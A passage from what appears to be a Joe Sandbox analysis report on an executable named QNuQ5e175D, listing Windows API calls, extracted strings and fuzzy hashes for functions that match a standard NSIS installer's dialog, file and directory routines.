                                                        • SetCursor.USER32(00000000), ref: 004048D3
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404902
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404914
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: ,F@$N
                                                        • API String ID: 3103080414-1819947528
                                                        • Opcode ID: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                        • Instruction ID: ccb0ec9a7d9d767aff215416cd1a2e620de701fb5c4a8d8609e67ea5798c0c5e
                                                        • Opcode Fuzzy Hash: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                        • Instruction Fuzzy Hash: 046192F1900209BFDB10AF64DD85EAA7B69FB84315F00853AFB05B65E0C778A951CF98
                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                        • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                        • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                        • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                        Function 004061BD Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406358,?,?), ref: 004061F8
                                                        • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 00406201
                                                          • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                          • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 0040621E
                                                        • wsprintfA.USER32 ref: 0040623C
                                                        • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406277
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406286
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004062BE
                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406314
                                                        • GlobalFree.KERNEL32(00000000), ref: 00406325
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040632C
                                                          • Part of subcall function 00406067: GetFileAttributesW.KERNEL32(00000003,004030E2,00442800,80000000,00000003), ref: 0040606B
                                                          • Part of subcall function 00406067: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$[Rename]
                                                        • API String ID: 2171350718-461813615
                                                        • Opcode ID: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
                                                        • Instruction ID: 21ba76f912769f78f8e3df01d85e3e27af82f360ac84a16f7af8f01611abcd2b
                                                        • Opcode Fuzzy Hash: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
                                                        • Instruction Fuzzy Hash: 66314330240325BBD2206B659D48F6B3B6CDF45708F16043EFD42B62C2DA3C982486BD
                                                        Function 004049E7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404A36
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A60
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404B11
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404B1C
                                                        • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B4E
                                                        • lstrcatW.KERNEL32(?,004326A0), ref: 00404B5A
                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B6C
                                                          • Part of subcall function 00405BBB: GetDlgItemTextW.USER32(?,?,00000400,00404BA3), ref: 00405BCE
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,0043F000,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                          • Part of subcall function 00406825: CharPrevW.USER32(?,?,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                        • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C2F
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C4A
                                                          • Part of subcall function 00404DA3: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                          • Part of subcall function 00404DA3: wsprintfW.USER32 ref: 00404E4D
                                                          • Part of subcall function 00404DA3: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A
                                                        • API String ID: 2624150263-3554254475
                                                        • Opcode ID: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                        • Instruction ID: 819d6111372f9eb468737b2dc9595d459319e5efb98401d1644bfd8e85b56d65
                                                        • Opcode Fuzzy Hash: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                        • Instruction Fuzzy Hash: 14A180B1901208ABDB11EFA5DD45BAFB7B8EF84314F11803BF601B62D1D77C9A418B69
                                                        Function 004030A2 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004030B3
                                                        • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030CF
                                                          • Part of subcall function 00406067: GetFileAttributesW.KERNEL32(00000003,004030E2,00442800,80000000,00000003), ref: 0040606B
                                                          • Part of subcall function 00406067: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 0040311B
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00403251
                                                        Strings
                                                        • Null, xrefs: 00403199
                                                        • Error launching installer, xrefs: 004030F2
                                                        • Inst, xrefs: 00403187
                                                        • soft, xrefs: 00403190
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 2803837635-527102705
                                                        • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                        • Instruction ID: 55eb758a8cc994b5b8f5e8324c308f37a69edd03a8198e206d37cac48cd63750
                                                        • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                        • Instruction Fuzzy Hash: E9519171900204AFDB209FA5DD86B9E7EACEB09356F20417BF504B62D1C7789F408BAD
                                                        Function 004065B4 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066D6
                                                        • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,756F23A0), ref: 004066EC
                                                        • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040674A
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406753
                                                        • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,?,756F23A0), ref: 0040677E
                                                        • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,756F23A0), ref: 004067D8
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 004066A7
                                                        • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406778
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 4024019347-730719616
                                                        • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                        • Instruction ID: fc4c1bf1ff31ba1b34cdfc75387d7881e57296f2874843d1a5ebc397bafcf832
                                                        • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                        • Instruction Fuzzy Hash: D16135716042009BD720AF24DD80B6B76E8EF85328F12453FF647B32D0DB7D9961865E
                                                        Function 004032D9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: *B$ A$ A$... %d%%
                                                        • API String ID: 551687249-3485722521
                                                        • Opcode ID: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
                                                        • Instruction ID: 3a086bfa1ae904988031f2e91e2ff9394e13111a018eeb379290de00703e2b75
                                                        • Opcode Fuzzy Hash: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
                                                        • Instruction Fuzzy Hash: 2F519F71900219DBCB11DF65DA44B9E7FB8AF44766F10413BE810BB2D1C7789A40CBA9
                                                        Function 0040455D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040457A
                                                        • GetSysColor.USER32(00000000), ref: 004045B8
                                                        • SetTextColor.GDI32(?,00000000), ref: 004045C4
                                                        • SetBkMode.GDI32(?,?), ref: 004045D0
                                                        • GetSysColor.USER32(?), ref: 004045E3
                                                        • SetBkColor.GDI32(?,?), ref: 004045F3
                                                        • DeleteObject.GDI32(?), ref: 0040460D
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404617
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction ID: 3bf72a8e0ffa46ee4049c610ab3cabbd6d50cfb344f29d4a8179c655b9565abb
                                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction Fuzzy Hash: 5C2165B1500B04ABC7319F38DE08B577BF4AF41715F04892EEA96A26E0D739D944CB54
                                                        Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                          • Part of subcall function 00406148: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040615E
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        • API String ID: 163830602-2366072709
                                                        • Opcode ID: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                        • Instruction ID: d1aefac9689752b6b3ea6a4f87dd4281ecbe68d6f3974aa7f4e2ef829afcd0bd
                                                        • Opcode Fuzzy Hash: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                        • Instruction Fuzzy Hash: 66510C75D04119AADF20EFD4CA85AAEBBB9FF44304F14817BE501B62D0D7B89D828B58
                                                        Function 004055FC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(0042BA48,00000000,?,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                        • lstrlenW.KERNEL32(0040343D,0042BA48,00000000,?,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                        • lstrcatW.KERNEL32(0042BA48,0040343D,0040343D,0042BA48,00000000,?,756F23A0), ref: 00405657
                                                        • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405669
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2531174081-0
                                                        • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                        • Instruction ID: 60923f6e922cea494a698f26c75bee70e53a21f42b4b77269416c2a585f1ce57
                                                        • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                        • Instruction Fuzzy Hash: 9A21A171900258BACB119FA5ED449DFBFB4EF45310F50843AF908B22A0C3794A40CFA8
                                                        Function 00404EB1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404ECC
                                                        • GetMessagePos.USER32 ref: 00404ED4
                                                        • ScreenToClient.USER32(?,?), ref: 00404EEE
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404F00
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction ID: fe1e2a7802b6c51c8f018a14413b1ee553013da7dc16083b389f375565560bf3
                                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction Fuzzy Hash: 20015E71900219BADB00DB94DD85BFEBBBCAF95711F10412BBB51B61D0C7B4AA418BA4
                                                        Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                        • MulDiv.KERNEL32(?,00000064,?), ref: 00403001
                                                        • wsprintfW.USER32 ref: 00403011
                                                        • SetWindowTextW.USER32(?,?), ref: 00403021
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 0040300B
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                        • Instruction ID: de78d71e2fb772fb87643f85aa6fa794cb5f2d0f129fd79c7e15704eeb750e6f
                                                        • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                        • Instruction Fuzzy Hash: 85014F71640208BBEF209F60DD49FEE3B79AB04344F008039FA02B51D0DBB996559B59
                                                        Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                        • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
                                                        • Instruction ID: fd7949a1005e62e73a365a75524f2bbb059e9229dbd09bef2f8decdc6a7611be
                                                        • Opcode Fuzzy Hash: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
                                                        • Instruction Fuzzy Hash: FA31A271D00124BBCF21AFA5CE89D9E7E79AF45324F14423AF421762E1CB798D418FA8
                                                        Function 00406825 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
